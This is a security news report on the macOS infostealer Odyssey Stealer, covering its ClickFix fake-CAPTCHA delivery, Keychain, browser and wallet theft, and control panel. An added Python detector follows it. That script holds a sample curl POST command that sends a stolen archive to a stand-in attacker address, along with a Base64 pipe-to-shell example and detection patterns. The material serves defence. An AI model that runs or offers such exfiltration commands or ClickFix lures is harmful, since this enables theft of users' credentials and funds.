The macOS-targeting Poseidon Stealer is believed to have been rebranded as Odyssey Stealer, CYFIRMA reported Thursday.

The Poseidon malware-as-a-service (MaaS) was previously spread through Google Ads in a malvertising campaign reported by Malwarebytes in June 2024. Now, Odyssey Stealer, attributed to Poseidon creator and AMOS Stealer co-author “Rodrigo,” is being distributed via ClickFix campaigns on spoofed finance, cryptocurrency news and Apple App Store websites, according to CYFIRMA.

The ClickFix method leverages fake Cloudflare CAPTCHA prompts that instruct users to copy and paste a Base64-encoded command into the Mac Terminal to prove they are not a robot. This command fetches an osascript command that executes the malicious Odyssey AppleScript. Upon execution, Odyssey displays a prompt requesting the user’s device password in an attempt to retrieve decrypted credentials from the Keychain service.

The infostealer targets Keychain, cryptocurrency wallet applications like Electrum, Coinomi and Exodus, and browsers including Safari, Chrome and Firefox. Pilfered browser data includes saved passwords and payment information, browsing history, autofill data, details from cryptocurrency and authentication-related plugins, and browser session cookies that can be used to hijack account sessions. Odyssey also snatches files from the Desktop and Documents folders that have the following extensions: .txt, .pdf, .docx, .jpg, .png, .rtf and .kdbx.

Stolen data is copied to a temporary directory created by the malware, /tmp/lovemrtrump, and compressed into an archive called out.zip before exfiltration. The archive is then sent to the attacker’s server via a curl POST request, with up to 10 additional requests made every 60 seconds if the initial upload fails. The stolen data is sent with headers that help the attacker track their victims by username and cid, as well as the malware buildid.

CYFIRMA uncovered details about the Odyssey Stealer control panel, which allows users to view and manage their infected devices, stolen data logs and custom malware versions. The panel includes a “Google Cookies Restore” section for hijacking browser sessions using stolen cookies, a “Guest Mode” for prospective buyers of the Odyssey MaaS to trial some features, and a dashboard for viewing attack statistics. Most of the Odyssey Stealer panels discovered by CYFIRMA were noted to be based in Russia.

Odyssey Stealer and Poseidon Stealer both share origins with AMOS Stealer, also known as Atomic Stealer, which is run as a separate macOS MaaS operation by a threat actor known as “ping3r.” AMOS Stealer was noted to be spread using the ClickFix method in another campaign reported earlier this month, highlighting the social engineering method’s growing popularity. The creation of Odyssey Stealer was also attributed to Rodrigo by Moonlock Lab, which found the infostealer being distributed through fake Ledger Live apps last month.

CYFIRMA published indicators of compromise (IoCs) for the latest campaign and recommends that organizations defend against Odyssey and similar malware by blocking osascript execution unless it is necessary for business operations, employing application whitelisting, using real-time and behavior-based monitoring to detect and respond to intrusions, and blocking outbound communication to known malicious IP addresses and domains. Mac users are also advised to be aware of sites impersonating app stores and to only install applications from the official Mac App Store or verified developer sites.
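The behaviours the article describes (a Base64-decoded command piped into a shell, osascript running outside an approved location, the /tmp/lovemrtrump staging directory, and repeated curl POSTs carrying username/cid/buildid headers) map directly onto the monitoring and osascript-allowlisting measures CYFIRMA recommends. The script below is an added example, not code from CYFIRMA or SC Media, that applies those checks to constructed process-execution events; the log format, the allowlists, the 203.0.113.7 destination and the odyssey.scpt file name are assumptions for the demo, not published IoCs.

```python
"""Flag Odyssey/ClickFix-style behaviours in constructed endpoint telemetry.

Assumptions (not from the article): each event is (timestamp, user, command line);
approved osascript paths and approved POST destinations are site-specific lists.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

ALLOWED_OSASCRIPT_PATHS = ("/Library/IT/",)        # assumption: approved automation scripts
ALLOWED_POST_HOSTS = {"updates.example.internal"}   # assumption: known-good egress destinations
STAGING_DIR = "/tmp/lovemrtrump"                    # staging directory named in the article
RETRY_WINDOW = timedelta(minutes=12)                # 10 retries at 60 s intervals, plus slack
RETRY_THRESHOLD = 3                                 # repeated POSTs before we call it a retry loop

RE_B64_TO_SHELL = re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b")
RE_OSASCRIPT = re.compile(r"(^|\s)osascript\b(.*)")
RE_CURL_POST = re.compile(r"\bcurl\b.*(?:-X\s*POST|--data\b|-d\s|-F\s|--form\b|-T\s)")
RE_URL_HOST = re.compile(r"https?://([^/\s'\"]+)")
RE_TRACK_HDR = re.compile(r"-H\s+'?(username|cid|buildid)\s*:", re.IGNORECASE)

# Constructed exfiltration command line; 203.0.113.7 is a documentation (TEST-NET-3) address.
EXFIL_CMD = ("curl -X POST -H 'username: alice' -H 'cid: 42' -H 'buildid: 7' "
             "-F 'file=@/tmp/lovemrtrump/out.zip' http://203.0.113.7/upload")

# Constructed sample events in the order an EDR might emit them. The Base64 string
# decodes to the harmless "echo hello"; only the pipe-into-shell shape matters here.
SAMPLE_EVENTS = [
    ("2025-06-19T10:12:01Z", "alice", "bash -c 'echo ZWNobyBoZWxsbw== | base64 -d | bash'"),
    ("2025-06-19T10:12:03Z", "alice", "osascript /tmp/lovemrtrump/odyssey.scpt"),
    ("2025-06-19T10:12:09Z", "alice", "zip -r /tmp/lovemrtrump/out.zip /tmp/lovemrtrump"),
    ("2025-06-19T10:12:10Z", "alice", EXFIL_CMD),
    ("2025-06-19T10:13:10Z", "alice", EXFIL_CMD),   # retry one minute later
    ("2025-06-19T10:14:10Z", "alice", EXFIL_CMD),   # and again
    ("2025-06-19T10:20:00Z", "bob", "osascript /Library/IT/inventory.scpt"),          # approved script
    ("2025-06-19T10:21:00Z", "bob", "curl -X POST -d 'ping' https://updates.example.internal/health"),
]


def classify(cmd):
    """Return the indicator names matched by one command line (empty list if benign)."""
    hits = []
    if RE_B64_TO_SHELL.search(cmd):
        hits.append("clickfix_b64_to_shell")
    m = RE_OSASCRIPT.search(cmd)
    if m and not any(p in m.group(2) for p in ALLOWED_OSASCRIPT_PATHS):
        hits.append("osascript_outside_allowlist")
    if STAGING_DIR in cmd:
        hits.append("odyssey_staging_dir")
    if RE_CURL_POST.search(cmd):
        hm = RE_URL_HOST.search(cmd)
        host = hm.group(1).split(":")[0] if hm else ""
        if host not in ALLOWED_POST_HOSTS:
            hits.append("curl_post_unapproved_host")
        if RE_TRACK_HDR.search(cmd):
            hits.append("victim_tracking_headers")
    return hits


def scan(events):
    """Return (timestamp, user, hits) for every event that matched at least one indicator."""
    return [(ts, user, hits) for ts, user, cmd in events if (hits := classify(cmd))]


def detect_retry_bursts(events, window=RETRY_WINDOW, threshold=RETRY_THRESHOLD):
    """Find (user, host) pairs with repeated POSTs to unapproved hosts inside the window,
    the 60-second retry loop the article describes. Returns {(user, host): count}."""
    posts = defaultdict(list)
    for ts, user, cmd in events:
        if "curl_post_unapproved_host" in classify(cmd):
            hm = RE_URL_HOST.search(cmd)
            key = (user, hm.group(1) if hm else "?")
            posts[key].append(datetime.fromisoformat(ts.replace("Z", "+00:00")))
    bursts = {}
    for key, times in posts.items():
        times.sort()
        for i, start in enumerate(times):
            n = sum(1 for t in times[i:] if t - start <= window)
            if n >= threshold:
                bursts[key] = n
                break
    return bursts


if __name__ == "__main__":
    for ts, user, hits in scan(SAMPLE_EVENTS):
        print(ts, user, ", ".join(hits))
    for (user, host), n in detect_retry_bursts(SAMPLE_EVENTS).items():
        print(f"retry loop: {user} -> {host} ({n} POSTs within {RETRY_WINDOW})")
```

The osascript rule implements CYFIRMA's "block unless necessary" advice as an allowlist rather than an outright block, so approved admin automation (bob's event) passes while a script launched from a temporary directory is flagged; the burst check turns the malware's fixed retry cadence into a signal in its own right, which also fires when the destination is not yet on a blocklist.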
MacOS malware Poseidon Stealer rebranded as Odyssey Stealer